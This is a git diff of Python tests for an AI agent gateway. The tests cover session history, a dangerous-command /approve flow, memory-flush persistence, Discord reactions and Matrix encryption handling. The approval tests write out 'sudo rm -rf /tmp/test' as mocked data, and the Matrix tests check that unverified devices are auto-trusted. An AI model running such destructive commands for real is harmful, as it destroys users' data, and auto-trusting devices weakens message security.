app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
headers={"X-Hermes-Session-Id": "existing-session"},
|
||||
# Request body has different history — should be ignored
|
||||
json={
|
||||
"model": "hermes-agent",
|
||||
"messages": [
|
||||
{"role": "user", "content": "old msg from client"},
|
||||
{"role": "assistant", "content": "old reply from client"},
|
||||
{"role": "user", "content": "new question"},
|
||||
],
|
||||
},
|
||||
)
|
||||
|
||||
assert resp.status == 200
|
||||
call_kwargs = mock_run.call_args.kwargs
|
||||
# History must come from DB, not from the request body
|
||||
assert call_kwargs["conversation_history"] == db_history
|
||||
assert call_kwargs["user_message"] == "new question"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_db_failure_falls_back_to_empty_history(self, adapter):
|
||||
"""If SessionDB raises, history falls back to empty and request still succeeds."""
|
||||
mock_result = {"final_response": "OK", "messages": [], "api_calls": 1}
|
||||
# Simulate DB failure: _session_db is None and SessionDB() constructor raises
|
||||
adapter._session_db = None
|
||||
app = _create_app(adapter)
|
||||
async with TestClient(TestServer(app)) as cli:
|
||||
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run, \
|
||||
patch("hermes_state.SessionDB", side_effect=Exception("DB unavailable")):
|
||||
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
|
||||
|
||||
resp = await cli.post(
|
||||
"/v1/chat/completions",
|
||||
headers={"X-Hermes-Session-Id": "some-session"},
|
||||
json={"model": "hermes-agent", "messages": [{"role": "user", "content": "Hi"}]},
|
||||
)
|
||||
|
||||
assert resp.status == 200
|
||||
call_kwargs = mock_run.call_args.kwargs
|
||||
assert call_kwargs["conversation_history"] == []
|
||||
assert call_kwargs["session_id"] == "some-session"
|
||||
|
|
|
|||
|
|
@ -4,6 +4,7 @@ Verifies that dangerous command approvals require explicit /approve or /deny
|
|||
slash commands, not bare "yes"/"no" text matching.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import time
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
|
|
@ -49,6 +50,7 @@ def _make_runner():
|
|||
runner._running_agents = {}
|
||||
runner._pending_messages = {}
|
||||
runner._pending_approvals = {}
|
||||
runner._background_tasks = set()
|
||||
runner._session_db = None
|
||||
runner._reasoning_config = None
|
||||
runner._provider_routing = {}
|
||||
|
|
@ -78,20 +80,32 @@ class TestApproveCommand:
|
|||
|
||||
@pytest.mark.asyncio
|
||||
async def test_approve_executes_pending_command(self):
|
||||
"""Basic /approve executes the pending command."""
|
||||
"""Basic /approve executes the pending command and sends feedback."""
|
||||
runner = _make_runner()
|
||||
source = _make_source()
|
||||
session_key = runner._session_key_for_source(source)
|
||||
runner._pending_approvals[session_key] = _make_pending_approval()
|
||||
|
||||
event = _make_event("/approve")
|
||||
with patch("tools.terminal_tool.terminal_tool", return_value="done") as mock_term:
|
||||
with (
|
||||
patch("tools.terminal_tool.terminal_tool", return_value="done") as mock_term,
|
||||
patch.object(runner, "_handle_message", new_callable=AsyncMock, return_value="agent continued"),
|
||||
):
|
||||
result = await runner._handle_approve_command(event)
|
||||
# Yield to let the background continuation task run.
|
||||
# This works because mocks return immediately (no real await points).
|
||||
await asyncio.sleep(0)
|
||||
|
||||
assert "✅ Command approved and executed" in result
|
||||
# Returns None because feedback is sent directly via adapter
|
||||
assert result is None
|
||||
mock_term.assert_called_once_with(command="sudo rm -rf /tmp/test", force=True)
|
||||
assert session_key not in runner._pending_approvals
|
||||
|
||||
# Immediate feedback sent via adapter
|
||||
adapter = runner.adapters[Platform.TELEGRAM]
|
||||
sent_text = adapter.send.call_args_list[0][0][1]
|
||||
assert "Command approved and executed" in sent_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_approve_session_remembers_pattern(self):
|
||||
"""/approve session approves the pattern for the session."""
|
||||
|
|
@ -104,12 +118,21 @@ class TestApproveCommand:
|
|||
with (
|
||||
patch("tools.terminal_tool.terminal_tool", return_value="done"),
|
||||
patch("tools.approval.approve_session") as mock_session,
|
||||
patch.object(runner, "_handle_message", new_callable=AsyncMock, return_value=None),
|
||||
):
|
||||
result = await runner._handle_approve_command(event)
|
||||
# Yield to let the background continuation task run.
|
||||
# This works because mocks return immediately (no real await points).
|
||||
await asyncio.sleep(0)
|
||||
|
||||
assert "pattern approved for this session" in result
|
||||
assert result is None
|
||||
mock_session.assert_called_once_with(session_key, "sudo")
|
||||
|
||||
# Verify scope message in adapter feedback
|
||||
adapter = runner.adapters[Platform.TELEGRAM]
|
||||
sent_text = adapter.send.call_args_list[0][0][1]
|
||||
assert "pattern approved for this session" in sent_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_approve_always_approves_permanently(self):
|
||||
"""/approve always approves the pattern permanently."""
|
||||
|
|
@ -122,12 +145,21 @@ class TestApproveCommand:
|
|||
with (
|
||||
patch("tools.terminal_tool.terminal_tool", return_value="done"),
|
||||
patch("tools.approval.approve_permanent") as mock_perm,
|
||||
patch.object(runner, "_handle_message", new_callable=AsyncMock, return_value=None),
|
||||
):
|
||||
result = await runner._handle_approve_command(event)
|
||||
# Yield to let the background continuation task run.
|
||||
# This works because mocks return immediately (no real await points).
|
||||
await asyncio.sleep(0)
|
||||
|
||||
assert "pattern approved permanently" in result
|
||||
assert result is None
|
||||
mock_perm.assert_called_once_with("sudo")
|
||||
|
||||
# Verify scope message in adapter feedback
|
||||
adapter = runner.adapters[Platform.TELEGRAM]
|
||||
sent_text = adapter.send.call_args_list[0][0][1]
|
||||
assert "pattern approved permanently" in sent_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_approve_no_pending(self):
|
||||
"""/approve with no pending approval returns helpful message."""
|
||||
|
|
@ -152,6 +184,40 @@ class TestApproveCommand:
|
|||
assert "expired" in result
|
||||
assert session_key not in runner._pending_approvals
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_approve_reinvokes_agent_with_result(self):
|
||||
"""After executing, /approve re-invokes the agent with command output."""
|
||||
runner = _make_runner()
|
||||
source = _make_source()
|
||||
session_key = runner._session_key_for_source(source)
|
||||
runner._pending_approvals[session_key] = _make_pending_approval()
|
||||
|
||||
event = _make_event("/approve")
|
||||
mock_handle = AsyncMock(return_value="I continued the task.")
|
||||
|
||||
with (
|
||||
patch("tools.terminal_tool.terminal_tool", return_value="file deleted"),
|
||||
patch.object(runner, "_handle_message", mock_handle),
|
||||
):
|
||||
await runner._handle_approve_command(event)
|
||||
# Yield to let the background continuation task run.
|
||||
# This works because mocks return immediately (no real await points).
|
||||
await asyncio.sleep(0)
|
||||
|
||||
# Agent was re-invoked via _handle_message with a synthetic event
|
||||
mock_handle.assert_called_once()
|
||||
synthetic_event = mock_handle.call_args[0][0]
|
||||
assert "approved" in synthetic_event.text.lower()
|
||||
assert "file deleted" in synthetic_event.text
|
||||
assert "sudo rm -rf /tmp/test" in synthetic_event.text
|
||||
|
||||
# The continuation response was sent to the user
|
||||
adapter = runner.adapters[Platform.TELEGRAM]
|
||||
# First call: immediate feedback, second call: agent continuation
|
||||
assert adapter.send.call_count == 2
|
||||
continuation_response = adapter.send.call_args_list[1][0][1]
|
||||
assert continuation_response == "I continued the task."
|
||||
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# /deny command
|
||||
|
|
|
|||
|
|
@ -3,7 +3,7 @@
|
|||
Verifies that:
|
||||
1. _is_session_expired() works from a SessionEntry alone (no source needed)
|
||||
2. The sync callback is no longer called in get_or_create_session
|
||||
3. _pre_flushed_sessions tracking works correctly
|
||||
3. memory_flushed flag persists across save/load cycles (prevents restart re-flush)
|
||||
4. The background watcher can detect expired sessions
|
||||
"""
|
||||
|
||||
|
|
@ -115,8 +115,8 @@ class TestIsSessionExpired:
|
|||
class TestGetOrCreateSessionNoCallback:
|
||||
"""get_or_create_session should NOT call a sync flush callback."""
|
||||
|
||||
def test_auto_reset_cleans_pre_flushed_marker(self, idle_store):
|
||||
"""When a session auto-resets, the pre_flushed marker should be discarded."""
|
||||
def test_auto_reset_creates_new_session_after_flush(self, idle_store):
|
||||
"""When a flushed session auto-resets, a new session_id is created."""
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="123",
|
||||
|
|
@ -127,7 +127,7 @@ class TestGetOrCreateSessionNoCallback:
|
|||
old_sid = entry1.session_id
|
||||
|
||||
# Simulate the watcher having flushed it
|
||||
idle_store._pre_flushed_sessions.add(old_sid)
|
||||
entry1.memory_flushed = True
|
||||
|
||||
# Simulate the session going idle
|
||||
entry1.updated_at = datetime.now() - timedelta(minutes=120)
|
||||
|
|
@ -137,9 +137,8 @@ class TestGetOrCreateSessionNoCallback:
|
|||
entry2 = idle_store.get_or_create_session(source)
|
||||
assert entry2.session_id != old_sid
|
||||
assert entry2.was_auto_reset is True
|
||||
|
||||
# The old session_id should be removed from pre_flushed
|
||||
assert old_sid not in idle_store._pre_flushed_sessions
|
||||
# New session starts with memory_flushed=False
|
||||
assert entry2.memory_flushed is False
|
||||
|
||||
def test_no_sync_callback_invoked(self, idle_store):
|
||||
"""No synchronous callback should block during auto-reset."""
|
||||
|
|
@ -160,21 +159,91 @@ class TestGetOrCreateSessionNoCallback:
|
|||
assert entry2.was_auto_reset is True
|
||||
|
||||
|
||||
class TestPreFlushedSessionsTracking:
|
||||
"""The _pre_flushed_sessions set should prevent double-flushing."""
|
||||
class TestMemoryFlushedFlag:
|
||||
"""The memory_flushed flag on SessionEntry prevents double-flushing."""
|
||||
|
||||
def test_starts_empty(self, idle_store):
|
||||
assert len(idle_store._pre_flushed_sessions) == 0
|
||||
def test_defaults_to_false(self):
|
||||
entry = SessionEntry(
|
||||
session_key="agent:main:telegram:dm:123",
|
||||
session_id="sid_new",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
)
|
||||
assert entry.memory_flushed is False
|
||||
|
||||
def test_add_and_check(self, idle_store):
|
||||
idle_store._pre_flushed_sessions.add("sid_old")
|
||||
assert "sid_old" in idle_store._pre_flushed_sessions
|
||||
assert "sid_other" not in idle_store._pre_flushed_sessions
|
||||
def test_persists_through_save_load(self, idle_store):
|
||||
"""memory_flushed=True must survive a save/load cycle (simulates restart)."""
|
||||
key = "agent:main:discord:thread:789"
|
||||
entry = SessionEntry(
|
||||
session_key=key,
|
||||
session_id="sid_flushed",
|
||||
created_at=datetime.now() - timedelta(hours=5),
|
||||
updated_at=datetime.now() - timedelta(hours=5),
|
||||
platform=Platform.DISCORD,
|
||||
chat_type="thread",
|
||||
memory_flushed=True,
|
||||
)
|
||||
idle_store._entries[key] = entry
|
||||
idle_store._save()
|
||||
|
||||
def test_discard_on_reset(self, idle_store):
|
||||
"""discard should remove without raising if not present."""
|
||||
idle_store._pre_flushed_sessions.add("sid_a")
|
||||
idle_store._pre_flushed_sessions.discard("sid_a")
|
||||
assert "sid_a" not in idle_store._pre_flushed_sessions
|
||||
# discard on non-existent should not raise
|
||||
idle_store._pre_flushed_sessions.discard("sid_nonexistent")
|
||||
# Simulate restart: clear in-memory state, reload from disk
|
||||
idle_store._entries.clear()
|
||||
idle_store._loaded = False
|
||||
idle_store._ensure_loaded()
|
||||
|
||||
reloaded = idle_store._entries[key]
|
||||
assert reloaded.memory_flushed is True
|
||||
|
||||
def test_unflushed_entry_survives_restart_as_unflushed(self, idle_store):
|
||||
"""An entry without memory_flushed stays False after reload."""
|
||||
key = "agent:main:telegram:dm:456"
|
||||
entry = SessionEntry(
|
||||
session_key=key,
|
||||
session_id="sid_not_flushed",
|
||||
created_at=datetime.now() - timedelta(hours=2),
|
||||
updated_at=datetime.now() - timedelta(hours=2),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
)
|
||||
idle_store._entries[key] = entry
|
||||
idle_store._save()
|
||||
|
||||
idle_store._entries.clear()
|
||||
idle_store._loaded = False
|
||||
idle_store._ensure_loaded()
|
||||
|
||||
reloaded = idle_store._entries[key]
|
||||
assert reloaded.memory_flushed is False
|
||||
|
||||
def test_roundtrip_to_dict_from_dict(self):
|
||||
"""to_dict/from_dict must preserve memory_flushed."""
|
||||
entry = SessionEntry(
|
||||
session_key="agent:main:telegram:dm:999",
|
||||
session_id="sid_rt",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
memory_flushed=True,
|
||||
)
|
||||
d = entry.to_dict()
|
||||
assert d["memory_flushed"] is True
|
||||
|
||||
restored = SessionEntry.from_dict(d)
|
||||
assert restored.memory_flushed is True
|
||||
|
||||
def test_legacy_entry_without_field_defaults_false(self):
|
||||
"""Old sessions.json entries missing memory_flushed should default to False."""
|
||||
data = {
|
||||
"session_key": "agent:main:telegram:dm:legacy",
|
||||
"session_id": "sid_legacy",
|
||||
"created_at": datetime.now().isoformat(),
|
||||
"updated_at": datetime.now().isoformat(),
|
||||
"platform": "telegram",
|
||||
"chat_type": "dm",
|
||||
# no memory_flushed key
|
||||
}
|
||||
entry = SessionEntry.from_dict(data)
|
||||
assert entry.memory_flushed is False
|
||||
|
|
|
|||
|
|
@ -168,3 +168,67 @@ async def test_reaction_helper_failures_do_not_break_message_flow(adapter):
|
|||
await adapter._process_message_background(event, build_session_key(event.source))
|
||||
|
||||
adapter.send.assert_awaited_once()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reactions_disabled_via_env(adapter, monkeypatch):
|
||||
"""When DISCORD_REACTIONS=false, no reactions should be added."""
|
||||
monkeypatch.setenv("DISCORD_REACTIONS", "false")
|
||||
|
||||
raw_message = SimpleNamespace(
|
||||
add_reaction=AsyncMock(),
|
||||
remove_reaction=AsyncMock(),
|
||||
)
|
||||
|
||||
async def handler(_event):
|
||||
await asyncio.sleep(0)
|
||||
return "ack"
|
||||
|
||||
async def hold_typing(_chat_id, interval=2.0, metadata=None):
|
||||
await asyncio.Event().wait()
|
||||
|
||||
adapter.set_message_handler(handler)
|
||||
adapter.send = AsyncMock(return_value=SendResult(success=True, message_id="999"))
|
||||
adapter._keep_typing = hold_typing
|
||||
|
||||
event = _make_event("4", raw_message)
|
||||
await adapter._process_message_background(event, build_session_key(event.source))
|
||||
|
||||
raw_message.add_reaction.assert_not_awaited()
|
||||
raw_message.remove_reaction.assert_not_awaited()
|
||||
# Response should still be sent
|
||||
adapter.send.assert_awaited_once()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reactions_disabled_via_env_zero(adapter, monkeypatch):
|
||||
"""DISCORD_REACTIONS=0 should also disable reactions."""
|
||||
monkeypatch.setenv("DISCORD_REACTIONS", "0")
|
||||
|
||||
raw_message = SimpleNamespace(
|
||||
add_reaction=AsyncMock(),
|
||||
remove_reaction=AsyncMock(),
|
||||
)
|
||||
|
||||
event = _make_event("5", raw_message)
|
||||
await adapter.on_processing_start(event)
|
||||
await adapter.on_processing_complete(event, success=True)
|
||||
|
||||
raw_message.add_reaction.assert_not_awaited()
|
||||
raw_message.remove_reaction.assert_not_awaited()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reactions_enabled_by_default(adapter, monkeypatch):
|
||||
"""When DISCORD_REACTIONS is unset, reactions should still work (default: true)."""
|
||||
monkeypatch.delenv("DISCORD_REACTIONS", raising=False)
|
||||
|
||||
raw_message = SimpleNamespace(
|
||||
add_reaction=AsyncMock(),
|
||||
remove_reaction=AsyncMock(),
|
||||
)
|
||||
|
||||
event = _make_event("6", raw_message)
|
||||
await adapter.on_processing_start(event)
|
||||
|
||||
raw_message.add_reaction.assert_awaited_once_with("👀")
|
||||
|
|
|
|||
|
|
@ -643,3 +643,353 @@ class TestMatrixEncryptedSendFallback:
|
|||
assert fake_client.room_send.await_count == 2
|
||||
second_call = fake_client.room_send.await_args_list[1]
|
||||
assert second_call.kwargs.get("ignore_unverified_devices") is True
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# E2EE: Auto-trust devices
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestMatrixAutoTrustDevices:
|
||||
def test_auto_trust_verifies_unverified_devices(self):
|
||||
adapter = _make_adapter()
|
||||
|
||||
# DeviceStore.__iter__ yields OlmDevice objects directly.
|
||||
device_a = MagicMock()
|
||||
device_a.device_id = "DEVICE_A"
|
||||
device_a.verified = False
|
||||
device_b = MagicMock()
|
||||
device_b.device_id = "DEVICE_B"
|
||||
device_b.verified = True # already trusted
|
||||
device_c = MagicMock()
|
||||
device_c.device_id = "DEVICE_C"
|
||||
device_c.verified = False
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.device_id = "OWN_DEVICE"
|
||||
fake_client.verify_device = MagicMock()
|
||||
|
||||
# Simulate DeviceStore iteration (yields OlmDevice objects)
|
||||
fake_client.device_store = MagicMock()
|
||||
fake_client.device_store.__iter__ = MagicMock(
|
||||
return_value=iter([device_a, device_b, device_c])
|
||||
)
|
||||
|
||||
adapter._client = fake_client
|
||||
adapter._auto_trust_devices()
|
||||
|
||||
# Should have verified device_a and device_c (not device_b, already verified)
|
||||
assert fake_client.verify_device.call_count == 2
|
||||
verified_devices = [call.args[0] for call in fake_client.verify_device.call_args_list]
|
||||
assert device_a in verified_devices
|
||||
assert device_c in verified_devices
|
||||
assert device_b not in verified_devices
|
||||
|
||||
def test_auto_trust_skips_own_device(self):
|
||||
adapter = _make_adapter()
|
||||
|
||||
own_device = MagicMock()
|
||||
own_device.device_id = "MY_DEVICE"
|
||||
own_device.verified = False
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.device_id = "MY_DEVICE"
|
||||
fake_client.verify_device = MagicMock()
|
||||
|
||||
fake_client.device_store = MagicMock()
|
||||
fake_client.device_store.__iter__ = MagicMock(
|
||||
return_value=iter([own_device])
|
||||
)
|
||||
|
||||
adapter._client = fake_client
|
||||
adapter._auto_trust_devices()
|
||||
|
||||
fake_client.verify_device.assert_not_called()
|
||||
|
||||
def test_auto_trust_handles_missing_device_store(self):
|
||||
adapter = _make_adapter()
|
||||
fake_client = MagicMock(spec=[]) # empty spec — no attributes
|
||||
adapter._client = fake_client
|
||||
# Should not raise
|
||||
adapter._auto_trust_devices()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# E2EE: MegolmEvent key request + buffering
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestMatrixMegolmEventHandling:
|
||||
@pytest.mark.asyncio
|
||||
async def test_megolm_event_requests_room_key_and_buffers(self):
|
||||
adapter = _make_adapter()
|
||||
adapter._user_id = "@bot:example.org"
|
||||
adapter._startup_ts = 0.0
|
||||
adapter._dm_rooms = {}
|
||||
|
||||
fake_megolm = MagicMock()
|
||||
fake_megolm.sender = "@alice:example.org"
|
||||
fake_megolm.event_id = "$encrypted_event"
|
||||
fake_megolm.server_timestamp = 9999999999000 # future
|
||||
fake_megolm.session_id = "SESSION123"
|
||||
|
||||
fake_room = MagicMock()
|
||||
fake_room.room_id = "!room:example.org"
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.request_room_key = AsyncMock(return_value=MagicMock())
|
||||
adapter._client = fake_client
|
||||
|
||||
# Create a MegolmEvent class for isinstance check
|
||||
fake_nio = MagicMock()
|
||||
FakeMegolmEvent = type("MegolmEvent", (), {})
|
||||
fake_megolm.__class__ = FakeMegolmEvent
|
||||
fake_nio.MegolmEvent = FakeMegolmEvent
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
await adapter._on_room_message(fake_room, fake_megolm)
|
||||
|
||||
# Should have requested the room key
|
||||
fake_client.request_room_key.assert_awaited_once_with(fake_megolm)
|
||||
|
||||
# Should have buffered the event
|
||||
assert len(adapter._pending_megolm) == 1
|
||||
room, event, ts = adapter._pending_megolm[0]
|
||||
assert room is fake_room
|
||||
assert event is fake_megolm
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_megolm_buffer_capped(self):
|
||||
adapter = _make_adapter()
|
||||
adapter._user_id = "@bot:example.org"
|
||||
adapter._startup_ts = 0.0
|
||||
adapter._dm_rooms = {}
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.request_room_key = AsyncMock(return_value=MagicMock())
|
||||
adapter._client = fake_client
|
||||
|
||||
FakeMegolmEvent = type("MegolmEvent", (), {})
|
||||
fake_nio = MagicMock()
|
||||
fake_nio.MegolmEvent = FakeMegolmEvent
|
||||
|
||||
# Fill the buffer past max
|
||||
from gateway.platforms.matrix import _MAX_PENDING_EVENTS
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
for i in range(_MAX_PENDING_EVENTS + 10):
|
||||
evt = MagicMock()
|
||||
evt.__class__ = FakeMegolmEvent
|
||||
evt.sender = "@alice:example.org"
|
||||
evt.event_id = f"$event_{i}"
|
||||
evt.server_timestamp = 9999999999000
|
||||
evt.session_id = f"SESSION_{i}"
|
||||
room = MagicMock()
|
||||
room.room_id = "!room:example.org"
|
||||
await adapter._on_room_message(room, evt)
|
||||
|
||||
assert len(adapter._pending_megolm) == _MAX_PENDING_EVENTS
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# E2EE: Retry pending decryptions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestMatrixRetryPendingDecryptions:
|
||||
@pytest.mark.asyncio
|
||||
async def test_successful_decryption_routes_to_text_handler(self):
|
||||
import time as _time
|
||||
|
||||
adapter = _make_adapter()
|
||||
adapter._user_id = "@bot:example.org"
|
||||
adapter._startup_ts = 0.0
|
||||
adapter._dm_rooms = {}
|
||||
|
||||
# Create types
|
||||
FakeMegolmEvent = type("MegolmEvent", (), {})
|
||||
FakeRoomMessageText = type("RoomMessageText", (), {})
|
||||
|
||||
decrypted_event = MagicMock()
|
||||
decrypted_event.__class__ = FakeRoomMessageText
|
||||
|
||||
fake_megolm = MagicMock()
|
||||
fake_megolm.__class__ = FakeMegolmEvent
|
||||
fake_megolm.event_id = "$encrypted"
|
||||
|
||||
fake_room = MagicMock()
|
||||
now = _time.time()
|
||||
|
||||
adapter._pending_megolm = [(fake_room, fake_megolm, now)]
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.decrypt_event = MagicMock(return_value=decrypted_event)
|
||||
adapter._client = fake_client
|
||||
|
||||
fake_nio = MagicMock()
|
||||
fake_nio.MegolmEvent = FakeMegolmEvent
|
||||
fake_nio.RoomMessageText = FakeRoomMessageText
|
||||
fake_nio.RoomMessageImage = type("RoomMessageImage", (), {})
|
||||
fake_nio.RoomMessageAudio = type("RoomMessageAudio", (), {})
|
||||
fake_nio.RoomMessageVideo = type("RoomMessageVideo", (), {})
|
||||
fake_nio.RoomMessageFile = type("RoomMessageFile", (), {})
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
with patch.object(adapter, "_on_room_message", AsyncMock()) as mock_handler:
|
||||
await adapter._retry_pending_decryptions()
|
||||
mock_handler.assert_awaited_once_with(fake_room, decrypted_event)
|
||||
|
||||
# Buffer should be empty now
|
||||
assert len(adapter._pending_megolm) == 0
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_still_undecryptable_stays_in_buffer(self):
|
||||
import time as _time
|
||||
|
||||
adapter = _make_adapter()
|
||||
|
||||
FakeMegolmEvent = type("MegolmEvent", (), {})
|
||||
|
||||
fake_megolm = MagicMock()
|
||||
fake_megolm.__class__ = FakeMegolmEvent
|
||||
fake_megolm.event_id = "$still_encrypted"
|
||||
|
||||
now = _time.time()
|
||||
adapter._pending_megolm = [(MagicMock(), fake_megolm, now)]
|
||||
|
||||
fake_client = MagicMock()
|
||||
# decrypt_event raises when key is still missing
|
||||
fake_client.decrypt_event = MagicMock(side_effect=Exception("missing key"))
|
||||
adapter._client = fake_client
|
||||
|
||||
fake_nio = MagicMock()
|
||||
fake_nio.MegolmEvent = FakeMegolmEvent
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
await adapter._retry_pending_decryptions()
|
||||
|
||||
assert len(adapter._pending_megolm) == 1
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_expired_events_dropped(self):
|
||||
import time as _time
|
||||
|
||||
adapter = _make_adapter()
|
||||
|
||||
from gateway.platforms.matrix import _PENDING_EVENT_TTL
|
||||
|
||||
fake_megolm = MagicMock()
|
||||
fake_megolm.event_id = "$old_event"
|
||||
fake_megolm.__class__ = type("MegolmEvent", (), {})
|
||||
|
||||
# Timestamp well past TTL
|
||||
old_ts = _time.time() - _PENDING_EVENT_TTL - 60
|
||||
adapter._pending_megolm = [(MagicMock(), fake_megolm, old_ts)]
|
||||
|
||||
fake_client = MagicMock()
|
||||
adapter._client = fake_client
|
||||
|
||||
fake_nio = MagicMock()
|
||||
fake_nio.MegolmEvent = type("MegolmEvent", (), {})
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
await adapter._retry_pending_decryptions()
|
||||
|
||||
# Should have been dropped
|
||||
assert len(adapter._pending_megolm) == 0
|
||||
# Should NOT have tried to decrypt
|
||||
fake_client.decrypt_event.assert_not_called()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_media_event_routes_to_media_handler(self):
|
||||
import time as _time
|
||||
|
||||
adapter = _make_adapter()
|
||||
adapter._user_id = "@bot:example.org"
|
||||
adapter._startup_ts = 0.0
|
||||
|
||||
FakeMegolmEvent = type("MegolmEvent", (), {})
|
||||
FakeRoomMessageImage = type("RoomMessageImage", (), {})
|
||||
|
||||
decrypted_image = MagicMock()
|
||||
decrypted_image.__class__ = FakeRoomMessageImage
|
||||
|
||||
fake_megolm = MagicMock()
|
||||
fake_megolm.__class__ = FakeMegolmEvent
|
||||
fake_megolm.event_id = "$encrypted_image"
|
||||
|
||||
fake_room = MagicMock()
|
||||
now = _time.time()
|
||||
adapter._pending_megolm = [(fake_room, fake_megolm, now)]
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.decrypt_event = MagicMock(return_value=decrypted_image)
|
||||
adapter._client = fake_client
|
||||
|
||||
fake_nio = MagicMock()
|
||||
fake_nio.MegolmEvent = FakeMegolmEvent
|
||||
fake_nio.RoomMessageText = type("RoomMessageText", (), {})
|
||||
fake_nio.RoomMessageImage = FakeRoomMessageImage
|
||||
fake_nio.RoomMessageAudio = type("RoomMessageAudio", (), {})
|
||||
fake_nio.RoomMessageVideo = type("RoomMessageVideo", (), {})
|
||||
fake_nio.RoomMessageFile = type("RoomMessageFile", (), {})
|
||||
|
||||
with patch.dict("sys.modules", {"nio": fake_nio}):
|
||||
with patch.object(adapter, "_on_room_message_media", AsyncMock()) as mock_media:
|
||||
await adapter._retry_pending_decryptions()
|
||||
mock_media.assert_awaited_once_with(fake_room, decrypted_image)
|
||||
|
||||
assert len(adapter._pending_megolm) == 0
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# E2EE: Key export / import
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestMatrixKeyExportImport:
|
||||
@pytest.mark.asyncio
|
||||
async def test_disconnect_exports_keys(self):
|
||||
adapter = _make_adapter()
|
||||
adapter._encryption = True
|
||||
adapter._sync_task = None
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.olm = object()
|
||||
fake_client.export_keys = AsyncMock()
|
||||
fake_client.close = AsyncMock()
|
||||
adapter._client = fake_client
|
||||
|
||||
from gateway.platforms.matrix import _KEY_EXPORT_FILE, _KEY_EXPORT_PASSPHRASE
|
||||
|
||||
await adapter.disconnect()
|
||||
|
||||
fake_client.export_keys.assert_awaited_once_with(
|
||||
str(_KEY_EXPORT_FILE), _KEY_EXPORT_PASSPHRASE,
|
||||
)
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_disconnect_handles_export_failure(self):
|
||||
adapter = _make_adapter()
|
||||
adapter._encryption = True
|
||||
adapter._sync_task = None
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.olm = object()
|
||||
fake_client.export_keys = AsyncMock(side_effect=Exception("export failed"))
|
||||
fake_client.close = AsyncMock()
|
||||
adapter._client = fake_client
|
||||
|
||||
# Should not raise
|
||||
await adapter.disconnect()
|
||||
assert adapter._client is None # still cleaned up
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_disconnect_skips_export_when_no_encryption(self):
|
||||
adapter = _make_adapter()
|
||||
adapter._encryption = False
|
||||
adapter._sync_task = None
|
||||
|
||||
fake_client = MagicMock()
|
||||
fake_client.close = AsyncMock()
|
||||
adapter._client = fake_client
|
||||
|
||||
await adapter.disconnect()
|
||||
# Should not have tried to export
|
||||
assert not hasattr(fake_client, "export_keys") or \
|
||||
not fake_client.export_keys.called
|
||||
|
|
|
|||
|
|
@ -212,47 +212,7 @@ class TestSessionHygieneWarnThreshold:
|
|||
assert post_compress_tokens < warn_threshold
|
||||
|
||||
|
||||
class TestCompressionWarnRateLimit:
|
||||
"""Compression warning messages must be rate-limited per chat_id."""
|
||||
|
||||
def _make_runner(self):
|
||||
from unittest.mock import MagicMock, patch
|
||||
with patch("gateway.run.load_gateway_config"), \
|
||||
patch("gateway.run.SessionStore"), \
|
||||
patch("gateway.run.DeliveryRouter"):
|
||||
from gateway.run import GatewayRunner
|
||||
runner = GatewayRunner.__new__(GatewayRunner)
|
||||
runner._compression_warn_sent = {}
|
||||
runner._compression_warn_cooldown = 3600
|
||||
